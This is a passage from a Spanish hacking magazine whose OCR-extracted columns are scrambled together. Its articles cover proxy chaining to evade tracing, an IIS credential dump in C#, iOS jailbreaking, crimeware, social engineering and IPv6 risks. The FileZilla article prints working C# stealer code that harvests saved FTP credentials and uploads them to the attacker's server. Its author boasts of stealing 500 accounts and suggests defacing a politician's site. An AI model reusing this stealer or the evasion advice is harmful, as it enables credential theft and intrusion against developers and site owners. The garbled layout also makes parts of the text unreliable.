165.228.131.12 80 transparent Australia 2012-01-18
203.144.144.164 80 transparent Thailand 2012-01-18
62.65.159.183 3128 transparent Switzerland 2012-01-18
63.149.98.18 80 anonymity United States 2012-01-18

IP. Es la IP con la que nos camuflajea-


remos y la que vern todas las paginas
que visitaremos, van entendiendo? ;P
Puerto. Canal de comunicacin por
donde mandaremos y recibiremos la
informacin.
Type. Creo que es la ms importante
ya que siempre deberemos escoger los
que tengan el tipo de HIgh Anonymi-
ty ya que estos no guardan Logs de
Bien con eso ya tenemos nuestro equipo configurado para navegar con
las computadoras que se conectan a
un servidor Proxy y ocultos detrs de este, por lo tanto como quedo la co-
ellos y as si nos quieren rastrear
nexin la plasmaremos en el esquema siguiente: (imagen)
pues ser sper pero sper
difcil que nos localicen.

PROXY CHAIN SERVER


OK continuemos como deca Ral
Velasco AUN HAY MAS, que quie-
ro decir con esto, todava podemos OK! Recuerden por favor que este es el ms sencillo de los mtodos y ten-
hacer mas annima nuestra navega- dramos que verificar si realmente est ocultando nuestra identidad, pero la
cin, por medio de una tcnica llamada tcnica de verificacin de identidad la dejaremos para el final del artculo.
pROXYchAIN con la cual nos co-
nectaramos a mas de 1 servidor Proxy,
por ejemplo nuestra conexin verdadera
esta en Mxico pero nos conectamos a un Proxy que
est en China y luego a uno en Afganistn y despus a
otro que est en Inglaterra y por ltimo uno que este en
Finlandia y aparte de esto todos los servidores son HIgh
Anonymity, hehehe que creen que pase?, pues estn en
lo cierto seria una tarea descomunal y una gran cantidad
de recursos se necesitaran para poder rastrear el origen
de la conexin, en el siguiente esquema planteo la
conexin por medio de Proxy Chain Servers:

18 www.hackingmexico.mx
navegacin annima
Como pueden ver este tipo de
conexin necesita de ms recursos,
y se asemeja mucho a lo que vemos
en las pelculas de gangters infor- PRINCIPIOS DE
mticos donde tratan de rastrear al OPERACIN
delincuente informtico y se dan DE SOCKSCHAIN SERVER
cuenta que la conexin pasa por va- SocksChain transmite la llamada
rios pases o cambio de localizacin, TCP del programa cliente (Fire-
aqu lgicamente se las muestro en fox) a travs de una cadena de
su forma real y sin tanto efecto es- proxy servers, Sockschain solo
pecial de Hollywood pero realmente se conecta el primer proxy server
esta si es efectiva, el nico problema de la cadena y el primer proxy
que le veo es que como se genera server a su vez manda la peticin
una conexin con varios servidores de conexin al segundo y as hasta
tendramos que tener proxy rpidos llegar al final de la cadena confi-
para poder llevar a cabo esta tcnica, gurada, usando esta tipo de cone-
como les deca a mis alumnos de xin donde el primero llamada al
la certificacin de hacking tico segundo y el segundo al tercero y
que doy, ---los delincuentes van el tercero al siguiente en la cadena,
un paso delante de nosotros y un el rastreo de la conexin inicial
experto en seguridad informtica es muy compleja, esto no quiere
debe de pensar como ellos para as decir que sea imposible de rastrear
no quedarse atrs y poder aplicar ya que se podra seguir el orden
seguridad ofensiva en el momento inverso de la conexin analizando
oportuno, tomando en cuenta esto, los logs de los servers conectados,
yo lo que hara es instalar un proxy pero surge una pregunta si alguno
server oculto en un cibercaf en una de los servidores de la cadena no
ciudad, otro en una universidad en guardo los logs? Pues hasta ah
una ciudad diferente y as hacerlo en llego el rastreo ;), tericamente
dos o tres lugares ms donde se que este tipo de conexin provee un
la conexin es estable y rpida, con alto grado de anonimato, me atre-
eso garantizara la conexin para vera a decir que el grado de ano-
atacar---. nimato sera de un 70% y podra
Pero muchos se preguntaran a aumentar el % si lo combinamos
estas alturas con que utilera po- con otras tcnicas pero tengan en
dra hacer esto? Bueno pues muy cuenta que el largo de la cadena
fcil, existe una utilera llamada es inversamente proporcional a la
SocksChain que es un programa velocidad de conexin.
que permite trabajar con cualquier
servicio a travs de una cadena de
Sockets o proxy server HTTP para
ocultar la IP real, este puede traba-
jar con TELNET, IRC etc.

www.hackingmexico.mx 19
navegacin annima

CONFIGURACIN
DEL SOCKSCHAIN
Ahora veremos un software
En la cual podemos ver
que tambin tiene lo suyo, este
diferentes iconos, ahora damos
sirve para hacer manualmente
clic en el icono que tiene
un Proxychain, o sea un
como dos calcetines
encadenamiento de varios Proxy`s
colgados y aparece
para as tener relativamente un
la siguiente ventana
buen anonimato en la red.
la cual nos muestra
Como dice mi hijo
una lista de servidores
papa menos platica y
Proxy a los cuales nos
mas accin hehehe, ok la
podramos conectar, una vez
versin que instalaremos ser
ah le damos click en UPDATE
SOCKSCHAIN v 3.11.151
LIST la cual bajara la nueva lista
mucha gente dice que este
de servidores Proxy que estn
software ya no funciona y
disponibles para su uso le damos
realmente en el sentido estricto
clic y esperamos que actualice,
tienen razn ya que la lista de
una vez realizada, le damos clic
Proxy`s servers que trae por
en el botn llamado TEST ALL
default est obsoleta, pero
esto para que pruebe si los Proxy
aqu no usaremos esa lista si
servers estn disponibles para su
no que vamos a crear nuestra
uso y conectados.
propia lista de servidores que
obtendremos de la pagina
mencionada en el apartado
CONFIGURACION DE
UTILERIAS.
Primeramente instalaremos
el sockschain como todo en
windows siguiente .. siguiente
hasta finalizar la instalacin, un
vez ah abrimos el programa y nos
aparecer la siguiente ventana:

20 www.hackingmexico.mx
navegacin annima
Una vez actualizada y Ahora configuremos nues-
testeados todos los Proxy ser- tra cadena de servidor Proxy a
vers aparecer algo como en la los cuales nos conectremos para
siguiente ventana: (imagen) ocultar Nuestra IP, para eso damos
clic en la ventana principal del progra-
ma en el signo de + de color verde, don-
de saldr la siguiente ventana:

Aqu como pueden ver ustedes apa-


recen unos servidores con un foquito
y otros con un icono circulo Rojo con
una X blanca eso quiere decir que los
segundos no estn en funcionamiento
entonces Tendremos que borrarlos se-
leccionndolos y dando clic en el botn
DELETE ya que estn en la lista solo
los que funcionaran, cerramos la ven- Una vez estando ah en la ventana de creacin de la candena, vamos a con-
tana y ahora si a empezar la confi- figurar primeramente en la opcin llamada NAME le ponemos el nombre
gurar el sockschain. con el cual identificaremos a nuestra cadena de conexin despus vamos a la
opcin donde pondremos la cantidad de Proxy`s servers a los que nos conectre-
mos en este caso haremos una conexin a TRES servidores.
Punto seguido vamos ahora si a aadir las ip de los servidores a los cuales nos
conectaremos como se muestra en la imagen de arriba, ya seleccionados damos clic
en el botn OK y listo programa configurado, ahora si viene la prueba de fuego de-
beremos configurar nuestro explorador de Internet manualmente para que se conecte,
ya no explicare esto aqu ya que en
el apartado de configuracin manual
ah lo explico cmo hacerlo, solo dir
que como Proxy Server debern poner
127.0.0.1 por el puerto 1080 guardas
los cambios y ahora si a probar la cone-
xin arrancamos el explorador de Inter-
net y vern como en el sockschain aparece
el encadenamiento que se est haciendo en la
siguiente ventana un ejemplo:

Con esto nos podemos dar cuenta que funciona


perfectamente el encadenamiento, en prximas
ediciones de la revista veremos las dems tc-
nicas que faltan por analizar.

Saludos.

www.hackingmexico.mx 21
Mi
hacking microsoft c#

Hacking

cro
soft
22 www.hackingmexico.mx
E

hacking microsoft c#
por Mario Alberto Gonzales aka Axxus

n este articulo vamos a demostrar se maneja para hostear aplicaciones en servido-


que con Microsoft tambin es po- res compartidos. cual el password nunca aparecer en el archivo
sible realizar hacking utilizando La estrategia para alcanzar el objetivo es de configuracin.
cdigo relativamente sencillo. El consultar todas las aplicaciones en el IIS, nave- La aplicacin navegara atreves de todas
objetivo es obtener el usuario y gar atravez de sus aplicaciones y como es buena las aplicaciones web y nos arrojara el nombre
el password con el cual est corriendo y au- prctica en las aplicaciones web, las cadenas de de usuario y la contrasea de todas las apli-
tenticndose una aplicacin en el servidor web conexin utilizan integrate security, que signifi- caciones hosteadas en ese server y con esto
(IIS), tomaremos como talon de Aquiles para ca esto? Que utilizamos una cuenta de dominio tendremos acceso tanto a la base de datos como
este servidor el actual esquema de negocio que para poder firmarnos en el servidor SQL, con lo a cualquier cuenta que tengan privilegios.

El cdigo es tan sencillo como el siguiente


ServerManager man=new ServerManager();
Console.Clear();
foreach (var site in man.Sites)
{
foreach (var app in site.Applications.ToList())
{
foreach (var directory in app.VirtualDirectories)
{
Console.WriteLine(Sitio {0} App {1}

tC#
UserName:{2},Password:{3}, site.Name, directory.Path,directory.
UserName,directory.Password);
}
}
}
Console.ReadLine();

Salida Consola Debug en el Ide

www.hackingmexico.mx 23
Hack
hackintosh

jailbreak en d
S aludos amigos mios, soy
M4ku4Z^^ y es un placer
formar parte de este proyec-
to tan interesante al cual fui
aceptado por el buen Megabyte, algunos ya
me conocen otros no tanto , espero poder
contribuir con este proyecto y al igual si
En mis palabras, seria como sacar
todo el provecho mximo de los disposi-
tivos que Apple nos vende.
Hasta la Fecha he logrado hacer jail-
tienen dudas ya saben como contactarme . break a ipods touchs, iphones, ipads y
Vamos a analizar el jailbreak a disposi- Apple tv 2G.
tivos iOS de Apple , revisar por que si o por No es ilegal hacer el jailbreak a nin-
que no debemos hacer el jailbreak, tambin gn dispositivo , pero lo que es ilegal
averiguaremos si nuestros dispositivos son es instalar aplicaciones de la APP STO-
candidatos o aptos para hacerlo. RE crackeadas, eso lo conseguimos con
Actualmente se pueden hacer jail- APPSYNC (pronto veremos su funcio-
break a los siguientes dispositivos de namiento).
Apple como los con : He de comentarles que el proceso de
-Ipod touch de 1 generacin jailbreak es diferente segn el IOS (ver-
-Ipod touch de 2 generacin sin de software instalado en el idevice)
-Ipod touch de 3 generacin .El firmware mas acual es el IOS 5.1 , yo
-Ipod touch de 4generacion aun no lo he instalado en ninguno de mis
-Iphone classic (1 generacin) dispositivos , pero mas adelante, en el
-Iphone de3 Generacin siguiente tutorial haremos una pequea
-Iphone de 4 Generacin resea de que es lo nuevo en ese IOS.
-Ipad de 1 generacin Al Hacer Jailbreak al dispositivo obte-
-Apple tv de 2 generacin. nemos bastantes mejoras en el desempeo
del idevice , un ejemplo y el

Definicin de Jailbreak
mas aclamado lo vemos en
el iphone de cualquier gene-
racin la cual es la liberacin
Tomado de Wikipedia del carrier o de las bandas , esto nos quiere
Jailbreak: (en espaol, escaparse de la decir que podemos usar el iphone con la
crcel o, ms literalmente, rompecrcel), operadora que mas nos convenga , ya sea
un proceso que permite a los usuarios de por precio , cobertura , por preferencia , o
los dispositivos iPhone, iPod Touch, iPad simplemente por decidir tener el iphone li-
y Apple TV de todas las generaciones eje- bre . Aqu hay dos cosas muy importantes:
cutar aplicaciones distintas a las alojadas Al hacer jailbreak, no significa que tendre-
en App Store, el sitio oficial de descarga mos liberado el telfono, eso es otro proce-
de programas para estos dispositivos. so que veremos mucho mas adelante.

24 www.hackingmexico.mx
intosh
hackintosh
ispositivos IOS
Por Juan Angel Osorio M4ku4z
M4ku4Z^^
m4ku4z@m4ku4z.net
www.m4ku4z.net

Al hacer ALGUNOS BENEFICIOS DE UN


DISPOSITIVO IOS CON Y SIN
Para poder hacer jailbreak a nuestro
dispositivo es importante sabe que no

jailbreak, no
JAILBREAK hay un jailbreak en general para todos los
Al Hacer el jailbreak obtendremos beneficios productos Apple , esto varia segn :
que no podemos tener con un dispositivo por -Generacin del Dispositivo

significa que llamarlo de alguna manera normal.


A continuacin detallare los beneficios
que su servidor ha usado en sus dispositivos:
-Versin de Firmware
-Modelo del dispositivo.
Mi dispositivo pierde garanta frente
tendremos Como pueden ver amigos los be-
neficios son bastantes buenos , pero la
a APPLE si le hago jailbreak?
La respuesta es NO , por que? , por

liberado el
lista no termina ah, son demasiados los que no modificamos el hardware , pero
que podemos obtener, los cuales iremos si modificamos el software, un ejemplo
aprendiendo a instalar y usar . muy claro seria , supongamos que mi

telfono, CARACTERSTICAS PARA


IPHONE tiene jailbreak y esta liberado,
trabaja bien en pocas palabras , pero..
OBTENER BENEFICIOS DEL falla la red 3G y tengo contratado un
eso es otro JAILBREAK
Como instalo dicho software para tener
plan de datos con la operadora X, como
le hago para llevarlo a la empresa X y

proceso que
esos beneficios? que me hagan valida la garanta (obvio
La respuesta es muy simple, tenemos tuve que haber descartado previamente ,
que realizar el jailbreak al sistema IOS ajustes de servicios 3G o que alguna apli-

veremos del dispositivo.


Mi dispositivo de Apple es apto para
cacin interfiera con la conexin del tel-
fono hacia la operadora) , Si bien se sabe
Tener jailbreak? si llevas un dispositivo a que te valide la
mucho mas Si pero debe cumplir ciertos requi-
sitos, antes de hacer un jailbreak es im-
garanta y tiene jailbreak la garanta se
anula , pero si restauramos un firmware

adelante.
portante leer y saber que vamos a hacer limpio se borra todo y procedemos a re-
exactamente. clamar la garanta.

DESPDIDA
Bueno amigos , hemos llegado a la recta final de esta seccin , donde aprendimos a co-
nocer todo el potencial que podramos tener si hacemos jailbreak a nuestros dispositivos
, adems de conocer algunas preguntas que se hacen muchos cuando van empezando en
esto del jailbreak . Por mi parte es todo , sin antes agradecer su atencin y nos vemos
pronto en otro capitulo ms.

www.hackingmexico.mx 25
robo de cuentas FTP

Robo de

H ola mi nickname es Corrup-


tedByte y en esta ocasin
abordaremos el tema de la
cuentas FTP y las vulnerabilidades con
las que cuenta FileZilla el cliente FTP
cin al servidor para descargar o enviar
un fichero y el servidor responde con ese
fichero, a grandes rasgos eso es lo que es
FTP aunque cuenta con un proceso ms
complejo, pero eso lo pueden estudiar
keyloggers, sniffing, penetracin me-
diante vulnerabilidades de tu sistema
operativo ya sea con Metasploit o a
mano e incluso XSS, entre otras, pero
aqu para que no anden de juackers adi-
ms usado por muchas razones, adems ms a fondo en nuestro seor Wikipedia, vinando contraseas, o haciendo fuerza
les dejare el cdigo fuente de un pequeo o lo pueden Googlear. Este protocolo bruta como el megabyte (just kidding),
script que desarrolle en C# .NET para el se utiliza por lo regular para entrar a un les voy a mostrar las vulnerabilidades
robo de cuentas FTP del cliente FileZilla. servidor web y subir pginas web, por lo con las que cuenta el cliente FTP Fi-
cual teniendo la cuenta FTP de la pgina lezilla que es el ms utilizado por los

Qu es FTP?
de pea nieto por ejemplo, pues entras, le desarrolladores web y como explotar
borras la pagina y subes una tuya nomas esas vulnerabilidades programando un
FTP o como en ingles se dice File Trans- para darle en la madre.| script, el da que libere el script con di-
fer Protocol, Protocolo de Transferencia ferentes mtodos de spreading obtuve

Robo de
de Archivos es un protocolo de red para 500 cuentas FTP en un solo da ya que
la transferencia de archivos entre siste- muchos freelancers usan este cliente

cuentas FTP
mas conectados a una red basado en la para administrar las diferentes pginas
arquitectura cliente-servidor. Es muy web de sus clientes, entonces una sola
sencillo de entender, del lado del cliente Hay muchas maneras de robar cuen- persona puede tener hasta 30 cuentas
(Tu, tu computadora) manda una peti- tas FTP como infeccin por troyanos, FTP guardadas de sus clientes.

26 www.hackingmexico.mx
cuentas

robo de cuentas FTP


en FileZilla
FTP
Vulnerabilidades
Al principio mencione acerca de que FileZilla
tiene vulnerabilidades, son 2 vulnerabilidades
<?xml version=1.0 encoding=UTF-8 standalone=yes ?>
<FileZilla3>
<RecentServers>
<Server>
<Host>CorruptedByte.net</Host>
<Port>21</Port>
que mas que vulnerabilidades de programa-
<Protocol>0</Protocol>
cin son vulnerabilidades de logstica la pri-
<Type>0</Type>
mera es el guardado automtico de las cuen-
<User>CorruptedByte</User>
tas FTP, si t te entras a un servidor con FTP
<Pass>MiContra</Pass>
con FileZilla el automticamente las guarda
<Logontype>1</Logontype>
en su registro, ni si quiera te pregunta es una
<TimezoneOffset>0</TimezoneOffset>
opcin marcada por defecto, la segunda y
<PasvMode>MODE_DEFAULT</PasvMode>
ms importante as como estpida es la mane-
<MaximumMultipleConnections>0</MaximumMultipleConnections>
ra en que almacena sus contraseas, FileZilla
<EncodingType>Auto</EncodingType>
no almacena las contraseas como lo hace el
<BypassProxy>0</BypassProxy>
MSN u otros programas que con las mismas
</Server>
dlls del sistema encriptan las cuentas, FileZi-
</RecentServers>
lla las almacena en un XML en texto plano en
</FileZilla3>
el siguiente formato:

Como pueden ver esta guardado en texto plano sin ningn tipo de encriptacin a simple
vista puedes ver como tienes los sub nodos con las credenciales FTP (Host, Port, User,
Pass), esto es una gran vulnerabilidad ya que como lo mencione es de los clientes FTP
ms usado por los desarrolladores web que manejan diferentes servidores, este archivo
se encuentra en la siguiente ruta:

C:\Users\CorruptedByte\AppData\Roaming\FileZilla\recentservers.xml

www.hackingmexico.mx 27
robo de cuentas FTP

Desarrollemos public void FileZillaAccounts(string sLogsPath)


{
el script XmlDocument xmlAccountsFile = new XmlDocument();
string sFilePath =
Ahora les mostrare como programar un
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString() +
script para robar las cuentas FTP de Fi-
\\FileZilla\\recentservers.xml;
leZilla, esto lo hare en C# por que es donde
xmlAccountsFile.Load(sFilePath);
programe todo un malware para robo de
xmlNodeList xmlRecentServers = xmlAccountsFile.GetElementsByTagName(
bsicamente cualquier tipo de cuentas.
RecentServers);
Primero que nada lo que vamos a
xmlNodeList xmlList = ((XmlElement)xmlRecentServers[0]).
programar ser un mtodo para sacar las
GetElementsByTagName(Server);
cuentas del FileZilla y guardrnoslas en
string sAccount;
un archivo de texto y esto se hace de la
foreach (XmlElement nodo in xmlList)
siguiente manera:
{
XmlNodeList xmlHost = nodo.GetElementsByTagName(Host);
XmlNodeList xmlPort = nodo.GetElementsByTagName(Port);
XmlNodeList xmlUser = nodo.GetElementsByTagName(User);
XmlNodeList xmlPass = nodo.GetElementsByTagName(Pass);
sAccount = string.Format(Host: {0} Port: {1} User: {2} Pass: {3},
xmlHost[0].InnerText, xmlPort[0].InnerText, xmlUser[0].InnerText, xmlPass[0].
InnerText);
FileStream fsLogs = new FileStream(sLogsPath, FileMode.OpenOrCreate,
FileAccess.Write);
fsLogs.Close();
StreamWriter swAccount = File.AppendText(sLogsPath);
swAccount.WriteLine(sAccount);
swAccount.Close();
}
}

28 www.hackingmexico.mx
robo de cuentas FTP
Es un mtodo muy simple (claro para los que sabemos pro-
gramar, si no sabes pues hay esta nuestro seor Google), a
simple vista se ve que lo nico que hace este mtodo es crear
un objeto XML para trabajar con el asi como se le da la ruta de
manera automtica con esta lnea:

Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString() +
\\FileZilla\\recentservers.xml;

.NET nos facilita la ruta y as nos quitamos el problema que nos


topamos con que el fichero XML este dentro de una carpeta den-
tro de otra carpeta con el nombre de usuario de la maquina que
obviamente desconocemos. Despus se procesa todo el XML y
se saca el valor de cada nodo que tiene las credenciales FTP, una
vez haciendo esto solo se guarda en un archivo de texto, pero ob-
viamente con esto nosotros no tendramos las credenciales FTP
solo se almacenaran en un archivo de texto de la vctima, para
eso ahora programaremos un mtodo para enviar las contraseas
por medio de FTP a nuestro servidor, de la siguiente manera:

public void Send(string sHost, string sDir, string sUser, string sPass, string sFile)
{
string ftpHostDirFile = ftp:// + sHost +sDir +sFile;
FtpWebRequest ftp = (FtpWebRequest)FtpWebRequest.
Create(ftpHostDirFile);
ftp.Credentials = new NetworkCredential(sUser, sPass);
ftp.KeepAlive = true;
ftp.UseBinary = true;
ftp.Method = WebRequestMethods.Ftp.UploadFile;
FileStream fs = File.OpenRead(sFile);
byte[] buffer = new byte[fs.Length];
fs.Read(buffer, 0, buffer.Length);
fs.Close();
Stream ftpstream = ftp.GetRequestStream();
ftpstream.Write(buffer, 0, buffer.Length);
ftpstream.Close();
}

Con este mtodo nada mas le pasamos nuestras credenciales


FTP para mandar el fichero con las contraseas y ya en el m-
todo principal solo llamamos a los mtodos que programa-
mos anteriormente, la otra manera de hacerlo ms simple es
mandando directamente el fichero XML por FTP pero cuando
lo programe estaba programando un sistema de facturacin
electrnica y estaba practicando con los objetos XML, a este
cdigo le falta mucho yo solo les di el mtodo principal que
es como extraer las contraseas pero el malware completo que
desarrolle tiene mtodos de spreading, ofuscacin, ejecucin
durante el arranque, entre otros as como mtodos para el robo
de cuentas guardadas en chrome, firefox, internet explorer,
MSN y otros clientes FTP menos usados. Si el megabyte no se
rockstarea cuando se haga popular la revista y me deja escribir
para la revista, seguir compartiendo muchos otros mtodos
para escritura de malware ya un poco ms avanzados entre
otras cosas interesantes.

www.hackingmexico.mx 29
robo de identidad mediante crimeware

Robo
de
Identidad
mediante
Crimeware Por: Arturo Zamora
@zeux0r
zeux0r@insecure.org.mx

30 www.hackingmexico.mx
robo de identidad mediante crimeware
Introduccin
El robo de identidad mediante el crimeware, actualmente es uno de los nego-
cios mas lucrativos para los delincuentes informticos, en la actualidad obtienen
ganancias muy importantes, pero Porqu es esto tan lucrativo?
Bueno como sabemos para los delincuentes informticos este tipo de actividades
requieren de una inversin mnima y mximas ganancias, estamos hablando de in-
vertir y generar un 99.09 % de ganancias, y con un mnimo de esfuerzo.As es el por
que el crimeware ha crecido demasiado en los ltimos aos.

Qu es el crimeware y como funciona?


Se le da el nombre de crimeware a aquel software diseado para el robo de cuentas o
robo de identidad del afectado, siendo usadas para obtener beneficios econmicos alta-
mente redituantes, este nombre se le da a keyloggers, backdoors, trojanos, entre otros, la
mayora de este tipo se software es encontrado con el modo de una botnet, las funciones
de este tipo de software daino son muchas, desde controlar nuestro ordenador, ver lo que
estamos realizando, tener acceso a el de manera remota y oculta ya que esto le permite al
atacante obtener la informacin deseada y mantener el control sobre cada una de las perso-
nas infectadas por dicho software botnet si es su caso.

Ingeniera social
Hay varias maneras de adquirir estos tipos de infecciones en la red, una de ellas es la ingeniera social.
Por lo regular el atacante maneja la ingeniera social a su favor invitando a los objetivos a entrar a
ver un anuncio, ya sean videos, fotos, etc.
Ya que las personas tenemos un defecto muy grande el cual se le llama curiosidad. Y por el simple
morbo de ver que sucede o que contiene ese correo aceptamos sin ni siquiera saber quien es el que
enva el correo o si esta verificado y as podemos ser una victima, otra de ellas es mediante el traspaso
de archivos de personas extraas que se hacen pasar por amigos para solamente robarte tu informacin
como estas hay muchsimas otras que por curiosidad acepten el contenido y queden vulnerables a perder
su informacin confidencial .

Ingeniera social
En el caso de las empresas el fall estara en los empleados, que a veces por falta de capacitacin
cometen estos errores.
Un caso seria la dependencia de soporte tcnico o de ayuda del personal de servicios informti-
cos y podra pasar esto:

Simulacin de ingeniera social


interactuando con la persona

Riiiiiiing riiiiiiiing (sonido telefonico)

Asistente ejecutiva: Bueno?

Chico malo: Que tal Amy buenas tardes soy de soporte tcnico, oye mira me informaron
que tu equipo esta demasiado lento y quiero corroborar a que se debe.

Asistente ejecutiva: Hay que bueno, si mira es que se me pone muy


lenta la mquina y no puedo trabajar bien.

Chico malo: Ok, mira tienes un icono de asistencia remota en tu escritorio, brelo y
me podras proporcionar tu usuario y contrasea para entrar a tu equipo as revisarlo
de manera remota?

Asistente ejecutiva: Claro que si, mi usuario es ***** y mi contrasea *******

www.hackingmexico.mx 31
robo de identidad mediante crimeware

Simulacin de ingeniera social interactuando con la persona.


Aqu el atacante estudio perfectamente su objetivo, saba a que hora llamar y por
parte de la asistente vemos que no pide ni siquiera un nombre, ni departamento,
podra haber llamado primero al superviso o simplemente no haber dado informa-
cin sin antes revisar si hay un ticket abierto y que numero es. As es como muchas
empresas pierden millones hoy en da ya que los usuarios estn malcapacitados y
no tienen informacin de los daos que este tipo de ataques pueden causar

Ataque silencioso
Crimeware no viene solo, por lo regular tiene tambin ayuda de otras vulnera-
bilidades, estas vulnerabilidades se encargan de ayudar al software malicioso a
infectar a los equipos vulnerables.
Porqu le doy el nombre de ataque silencioso?
Ya hace tiempo existen scripts llamados exploit packs que se encargan de ex-
plotar varias vulnerabilidades en sistemas por lo regular estos se aprovechan de
la ejecucin remota en navegadores u otros complementos como lo son Word,
Excel, power point, java, reproductores de video y msica. Este error
hace que el usuario al aceptar, entrar o abrir un sitio quede automticamente in-
fectado y sea una victima mas de este software. Con la ayuda de los exploit packs
el software se encontrara incrustado en el cdigo fuente del sitio como un frame
abriendo otro sitio o como un applet o ventana emergente tratando de hacer que
lo veamos casi obligatoriamente

Alerta sistema Infectado


Cuando el sistema ha sido infectado, aparte de estar perdiendo informacin confidencial,
tambin en algunos casos se perderan cantidades monetarias del usuario victima de
sus cuentas bancarias, tarjetas de crdito, pero eso no seria todo, si no tambin el usuario
victima estara perdiendo su identidad ya que el atacante puede usar sus recursos para
su beneficio y apoyando a la infeccin y distribucin de este crimeware.

Porqu lo estara apoyando?


Al hablar de estar apoyando a la distribucin e infeccin del crimeware no se trata
de que el usuario victima este de acuerdo con el atacante para esto, si no que
de manera inconsciente la victima puede introducir artculos de almacenamiento
masivo y llevarlo a otros equipos de infectndolos estos si no se encuentran pro-
tegidos automticamente como nos muestra la imagen

32 www.hackingmexico.mx
robo de identidad mediante crimeware
Porqu lo estara apoyando?
Los lugares mas comunes de infeccin son escuelas, parques, cibercafs o simple-
mente lugares pblicos del cual mas de uno tenga acceso.

Recoleccin de informacin
La recoleccin de informacin por parte del atacante la hace mediante bases de
datos o envindola via correo electrnico.
Unos ejemplos de ello son Botnets, almacenamiento mediante base de datos
via web. Tu identidad fue robada cuando has sido victima de robo de identidad
ya hay poco que puedas hacer, ya que tu nombre, domicilio entre otras cosas
han sido comprometidos; tambin a veces se tuvieron perdidas econmicas
en compras que no fueron autorizadas por la persona propietaria real de las
cuentas o simplemente extrajeron el dinero sin autorizacin consiente del usuario.

Proteccin
Los mtodos para protegernos son muchos , y tambin muchos softwares que
nos ayudan a esto.
Lo que tendramos mas en cuenta es controlar un poco mas la curiosidad,
antes de abrir un correo ver si la persona en verdad es quien dice ser, si no te-
nemos ese nombre en nuestras listas no abrirlo, evitar abrir archivos adjuntos,
no seguir links que nos lleven a otros sitios fuera del correo, no abrir los correos
de bandeja spam, si es que no los conocemos, y si los conocemos verificar que
sea el que lo enva, mantener nuestro antivirus actualizado y verificar una ves
a la semana que nuestro sistema este libre de amenazas, tener un scanner de
malware y que nos avise de sitios potencialmente peligrosos, verificar que no
tengamos procesos raros ejecutndose en nuestro sistema.
Ya si tienes mas paranoia , verificar todas las conexiones que hacemos y a donde
las hacemos, ver nuestro archivo host en caso que estemos usando Windows, y
. Naa creo que esas son todas. FIN?

www.hackingmexico.mx 33
riesgos de seguridad en IPV6

340.2
82.36
6.920
riesgosde .938.
seguridad 463.4
en
63.37
IPv6
4.607
.431.7
Msc. Helios Mier
hmier@ieee.org

68.21
1.456

34 www.hackingmexico.mx
riesgos de seguridad en IPV6
ANTE tocolo IP el cul estubo preparado para
finales de los noventas, teniendo casi
dera imperativa para todos, sin embargo
muchos implementadores de tecnologa y

CE 10 aos de implementacin y pruebas,


siendo a partir del ao 2005 cuando se
usuarios se encuentran con muy variantes
grados de avance o retraso en los prepa-
DEN impulsa de manera generalizada una ex-
hortacin global a iniciar la transicin al
rativos, creando una situacin de riesgos
de seguridad que no se ha visto desde
TES nuevo protocolo denominado Protocolo que internet cambi del protocolo NCP a
de Internet versin 6 IPv6. TCP/IP hace varias generaciones.
El corazn del funcionamiento bsico de
internet radica en el Protocolo de Inter- En diversas partes del mundo se han to-
net mejor conocido como protocolo IP, mado variados esfuerzos para facilitar o Disponibilidad
actualmente en uso en su versin 4 desde
1977 cuya capacidad de direccionamien-
acelerar la transicin al nuevo protocolo
pero sin embargo, se espera que al me-
inesperada
to de 32 bits fue prevista desde 1995 que nos durante un periodo de 10 a 15 aos de IPv6
se agotara en algn mediano plazo, lo se viva una experiencia bastante dispar
cual oficialmente se reconoci ocurri en en distintas regiones y distintos tipos de Casi todos los nuevos productos tecnolgi-
2011, quedando solo unas cuantas direc- usuarios para adoptar o disear nuevas cos en hardware y software con conectivi-
ciones por repartir en los registros regio- tecnologas compatibles con el nuevo dad a internet vienen preparados de fbrica
nales con un estimado de disponibilidad protocolo, lo cual crea un escenario de para usar el protocolo IPv6, y muchos de
slo para unos pocos aos ms. seguridad peculiar para muchos debido ellos vienen con el protocolo habilitado an
a la varianza de preparativos adecuados cuando no haya una conectividad completa
Desde que se visualiz este escenario de y por el retraso en la implementacin en por parte del ISP, o en caso del que el ISP
incapacidad de soportar un crecimiento comparacin con la disponilidad y acceso ya ofrezca el servicio, que adicionalmente a
sostenido del acceso de nuevos usuarios a la nueva tecnologa que ya se encuentra la conectividad IPv4, se tengan dispositivos
y dispositivos al internet, se trabaj en la presente en diversos rubros de internet. y servicios conectados por IPv6 sin que el
creacin de una siguiente versin del pro- La transicin al protocolo IPv6 se consi- usuario se de cuenta.

www.hackingmexico.mx 35
riesgos de seguridad en IPV6

Esto obliga que los planes y polticas de


seguridad sean revisadas con prontitud
Los mecanismos de proteccin que se
basen en alguna forma de control o refe-
Acceso
para contemplar los riesgos de ya con- rencia por direccionamiento IPv4 no ten- directo
IPv6
tar con la presencia del protocolo IPv6 drn una funcionalidad idntica si se rea-
y establecer mecanismos de seguridad lizan comunicaciones por IPv6, siendo el
adecuados para que lo regulen o en su ejemplo ms evidente el de los firewalls por
defecto asegurarse de anular por el mo- por ejemplo en un sistema unix/linux,
mento su presencia para reducir riesgos donde IPtables funciona por separado de Todo sistema y servicio que funcione
como los siguientes que mencionaremos. su contraparte IP6tables. con IPv6 se debe de considerar que se
encuentra con acceso directo y pblico a
Convivencia El origen o destino de una comunicacin
que se requiere sea regulada no ser igual
internet, de manera que se requiere ase-
gurarse que se cuenta con firewall de red
simultnea si se realiza por IPv6, an cuando los ser- o al menos con un firewall personal en
de mltiples vicios en capas superiores de OSI sean cada sistema.

protocolos
por protocolos conocidos, se podran evi-
tar los mecanismos de proteccin simple- An cuando fsicamente se tenga una red
mente con buscar el acceso a traves de local y se manejen servicios locales, se
una direccin IPv6. debe de tener siempre presente que con
IPv6 funciona de una manera distinta a
una direccin IPv6 se encuentra uno de
IPv4, de forma que deben de tratarse como
Si bien no ser lo indicado suprimir el frente al internet pblico, y por lo tanto al
dos elementos aparte aunque se encuentren
protocolo IPv6 de un sistema, los ad- alcance de cualquier agente externo.
presentes en un mismo sistema, lo cual se
ministradores tienen que aprender a
espera que sea la situacin predominante
considerar duplicar los mecanismos de Si bien a cada usuario se le delegar
durante el periodo de transicin hasta que
proteccin para que se apliquen con la un segmento IPv6 con considerable
la necesidad de contar an con servicios a
misma efectividad a todo lo que venga cantidad de direcciones para disponer
travs de IPv4 sea abandonada.
